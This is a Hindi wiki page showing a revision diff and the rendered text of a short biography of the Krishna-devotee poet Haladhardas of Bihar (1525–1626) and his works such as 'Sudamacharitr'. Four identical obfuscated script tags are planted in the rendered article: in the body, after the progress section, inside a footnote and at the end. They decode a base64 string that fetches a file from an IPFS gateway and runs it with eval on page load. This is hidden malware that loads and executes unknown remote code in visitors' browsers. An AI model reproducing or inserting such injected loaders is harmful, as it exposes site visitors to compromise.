Difference between revisions of "हलधरदास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "khoj.bharatdiscovery.org" to "bharatkhoj.org")
 
(4 intermediate revisions by 3 users not shown)
Line 4: Line 4:
 
|पूरा नाम=हलधरदास
 
|पूरा नाम=हलधरदास
 
|अन्य नाम=
 
|अन्य नाम=
|जन्म=1525  
+
|जन्म=1525 ई.
|जन्म भूमि=
+
|जन्म भूमि=[[मुजफ्फरपुर ज़िला|मुजफ्फरपुर ज़िले]], [[बिहार]]
|मृत्यु=1626  
+
|मृत्यु=1626 ई.
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
 
|अभिभावक=
 
|अभिभावक=
Line 12: Line 12:
 
|पति/पत्नी=
 
|पति/पत्नी=
 
|संतान=
 
|संतान=
|कर्म भूमि=
+
|कर्म भूमि=[[भारत]]
 
|कर्म-क्षेत्र=
 
|कर्म-क्षेत्र=
|मुख्य रचनाएँ=सुदामाचरित्र, श्रीमद्भागवत भाषा, शिवस्तोत्र  
+
|मुख्य रचनाएँ='सुदामाचरित्र', 'श्रीमद्भागवत भाषा', 'शिवस्तोत्र' आदि।
 
|विषय=
 
|विषय=
|भाषा=फ़ारसी, संस्कृत
+
|भाषा=[[फ़ारसी भाषा|फ़ारसी]], [[संस्कृत भाषा|संस्कृत]]
 
|विद्यालय=
 
|विद्यालय=
 
|शिक्षा=
 
|शिक्षा=
 
|पुरस्कार-उपाधि=
 
|पुरस्कार-उपाधि=
|प्रसिद्धि=कृष्ण भक्ति
+
|प्रसिद्धि=कृष्ण भक्त कवि
 
|विशेष योगदान=
 
|विशेष योगदान=
|नागरिकता=
+
|नागरिकता=भारतीय
 
|संबंधित लेख=
 
|संबंधित लेख=
 
|शीर्षक 1=
 
|शीर्षक 1=
Line 28: Line 28:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=[[सूरदास]] तथा हलधरदास दोनों नेत्रहीन हो गए थे। दोनों ने [[कृष्ण]] की सखीभाव से उपासना की थी। हलधरदास का कृष्ण भक्त कवियों में विशिष्ट स्थान है।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''हलधरदास''' (जन्म-1525 ई.: मृत्यु-1626 ई.) [[बिहार]] के प्रसिद्ध कवियों में से एक थे। [[सूरदास]] के बाद ये [[कृष्ण]] की भक्ति-परंपरा के दूसरे प्रसिद्ध [[कवि]] थे। सूरदास और हलधरदास में जीवन और [[भक्ति]] को लेकर बहुत कुछ साम्य भी था।
+
'''हलधरदास''' (जन्म-1525 ई.: मृत्यु-1626 ई.) [[बिहार]] के प्रसिद्ध कवियों में से एक थे। [[सूरदास]] के बाद ये [[कृष्ण]] की भक्ति-परंपरा के दूसरे प्रसिद्ध [[कवि]] थे। सूरदास और हलधरदास में जीवन और [[भक्ति]] को लेकर बहुत कुछ साम्य भी था।<ref name="nn">{{cite web |url=http://bharatkhoj.org/india/%E0%A4%B9%E0%A4%B2%E0%A4%A7%E0%A4%B0%E0%A4%A6%E0%A4%BE%E0%A4%B8|title=हलधरदास |accessmonthday=25 जुलाई|accessyear=2015|last= |first= |authorlink= |format= |publisher=भारतखोज|language=हिन्दी}}</ref>
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
हलधरदास का जन्म [[बिहार|बिहार राज्य]] के [[मुजफ्फरपुर ज़िला|मुजफ्फरपुर ज़िले]] के अंतर्गत पदमौल नामक [[ग्राम]] में सन 1525 ई. के आसपास हुआ था। शैशव में ही इनके [[माता]]-[[पिता]] की मृत्यु हो गई थी। अपने रज की छत्रछाया में ये पले। [[चेचक|शीतला]] से पीड़ित होकर इन्होंने दोनों [[आँख|आँखें]] खो दीं। ये [[फ़ारसी भाषा|फ़ारसी]] और [[संस्कृत]] के अच्छे ज्ञाता थे तथा [[पुराण]], [[शास्त्र]] और [[व्याकरण]] का भी इन्होंने अध्ययन किया था।
+
हलधरदास का जन्म [[बिहार|बिहार राज्य]] के [[मुजफ्फरपुर ज़िला|मुजफ्फरपुर ज़िले]] के अंतर्गत पदमौल नामक [[ग्राम]] में सन 1525 ई. के आसपास हुआ था। शैशव में ही इनके [[माता]]-[[पिता]] की मृत्यु हो गई थी। अपने रज की छत्रछाया में ये पले। [[चेचक|शीतला]] से पीड़ित होकर इन्होंने दोनों [[आँख|आँखें]] खो दीं। ये [[फ़ारसी भाषा|फ़ारसी]] और [[संस्कृत]] के अच्छे ज्ञाता थे तथा [[पुराण]], [[शास्त्र]] और [[व्याकरण]] का भी इन्होंने अध्ययन किया था।
 
==रचनाएँ==
 
==रचनाएँ==
 
हलधरदास जी की निम्न तीन पुस्तकों का पता चला है-
 
हलधरदास जी की निम्न तीन पुस्तकों का पता चला है-
Line 41: Line 41:
 
#'शिवस्तोत्र'
 
#'शिवस्तोत्र'
  
उनकी अंतिम पुस्तक संस्कृत में है। 'सुदामाचरित्र' उनकी सर्वप्रसिद्ध पुस्तक है, जिसकी रचना सन 1565 ई. में हुई थी। यह सुदामाचरित्र परंपरा के अद्यावधि ज्ञात काव्यों में ऐतिहासिक दृष्टि से सर्वप्रथम और काव्य की दृष्टि से उत्कृष्टतम है।
+
उनकी अंतिम पुस्तक [[संस्कृत]] में है। 'सुदामाचरित्र' उनकी सर्वप्रसिद्ध पुस्तक है, जिसकी रचना सन 1565 ई. में हुई थी। यह सुदामाचरित्र परंपरा के अद्यावधि ज्ञात काव्यों में ऐतिहासिक दृष्टि से सर्वप्रथम और [[काव्य]] की दृष्टि से उत्कृष्टतम है।
 
==कृष्णभक्त कवियों में विशिष्ट स्थान==
 
==कृष्णभक्त कवियों में विशिष्ट स्थान==
[[सूरदास]] तथा हलधरदास दोनों नेत्रहीन हो गए थे। दोनों ने [[कृष्ण]] की सख्यभाव से उपासना की। दोनों में एक बड़ा अंतर भी है। सूर के कृष्ण प्रधानत: लीलाशाली हैं, जबकि हलधर के कृष्ण ऐश्वर्यशाली। सूर एवं अन्य कृष्णभक्त कवियों की प्रतिभा मुक्तक के क्षेत्र में विकसित हुई थी, उनका भी काव्य प्रतिभा का मानदंड प्रबंध है। 'सुदामाचरित्र' एक उत्तम खंडकाव्य है। इस तरह हलधरदास कृष्णभक्त कवियों में एक विशिष्ट स्थान के अधिकारी हैं।  
+
[[सूरदास]] तथा हलधरदास दोनों नेत्रहीन हो गए थे। दोनों ने [[कृष्ण]] की सख्यभाव से उपासना की। दोनों में एक बड़ा अंतर भी है। सूर के कृष्ण प्रधानत: लीलाशाली हैं, जबकि हलधर के कृष्ण ऐश्वर्यशाली। सूर एवं अन्य कृष्णभक्त कवियों की प्रतिभा [[मुक्तक]] के क्षेत्र में विकसित हुई थी, उनका भी काव्य प्रतिभा का मानदंड प्रबंध है। 'सुदामाचरित्र' एक उत्तम [[खंडकाव्य]] है। इस तरह हलधरदास कृष्णभक्त कवियों में एक विशिष्ट स्थान के अधिकारी हैं।<ref name="nn"/>
 
==निधन==
 
==निधन==
 
हलधरदास जी का निधन 1626 ई. के आसपास हुआ।
 
हलधरदास जी का निधन 1626 ई. के आसपास हुआ।
Line 52: Line 52:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारत के कवि}}
 
{{भारत के कवि}}
[[Category:कवि]][[Category:भक्ति काल]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:हिन्दी विश्वकोश]]
+
[[Category:कवि]][[Category:भक्ति काल]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:नया पन्ना]][[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:27, 25 October 2017

haladharadas
poora nam haladharadas
janm 1525 ee.
janm bhoomi mujaphpharapur zile, bihar
mrityu 1626 ee.
karm bhoomi bharat
mukhy rachanaean 'sudamacharitr', 'shrimadbhagavat bhasha', 'shivastotr' adi.
bhasha farasi, sanskrit
prasiddhi krishna bhakt kavi
nagarikata bharatiy
any janakari sooradas tatha haladharadas donoan netrahin ho ge the. donoan ne krishna ki sakhibhav se upasana ki thi. haladharadas ka krishna bhakt kaviyoan mean vishisht sthan hai.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

haladharadas (janm-1525 ee.: mrityu-1626 ee.) bihar ke prasiddh kaviyoan mean se ek the. sooradas ke bad ye krishna ki bhakti-paranpara ke doosare prasiddh kavi the. sooradas aur haladharadas mean jivan aur bhakti ko lekar bahut kuchh samy bhi tha.[1]

janm tatha shiksha

haladharadas ka janm bihar rajy ke mujaphpharapur zile ke aantargat padamaul namak gram mean san 1525 ee. ke asapas hua tha. shaishav mean hi inake mata-pita ki mrityu ho gee thi. apane raj ki chhatrachhaya mean ye pale. shitala se pi dit hokar inhoanne donoan aankhean kho dian. ye farasi aur sanskrit ke achchhe jnata the tatha puran, shastr aur vyakaran ka bhi inhoanne adhyayan kiya tha.

rachanaean

haladharadas ji ki nimn tin pustakoan ka pata chala hai-

  1. 'sudamacharitr'
  2. 'shrimadbhagavat bhasha'
  3. 'shivastotr'

unaki aantim pustak sanskrit mean hai. 'sudamacharitr' unaki sarvaprasiddh pustak hai, jisaki rachana san 1565 ee. mean huee thi. yah sudamacharitr paranpara ke adyavadhi jnat kavyoan mean aitihasik drishti se sarvapratham aur kavy ki drishti se utkrishtatam hai.

krishnabhakt kaviyoan mean vishisht sthan

sooradas tatha haladharadas donoan netrahin ho ge the. donoan ne krishna ki sakhyabhav se upasana ki. donoan mean ek b da aantar bhi hai. soor ke krishna pradhanat: lilashali haian, jabaki haladhar ke krishna aishvaryashali. soor evan any krishnabhakt kaviyoan ki pratibha muktak ke kshetr mean vikasit huee thi, unaka bhi kavy pratibha ka manadand prabandh hai. 'sudamacharitr' ek uttam khandakavy hai. is tarah haladharadas krishnabhakt kaviyoan mean ek vishisht sthan ke adhikari haian.[1]

nidhan

haladharadas ji ka nidhan 1626 ee. ke asapas hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 haladharadas (hindi) bharatakhoj. abhigaman tithi: 25 julaee, 2015.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>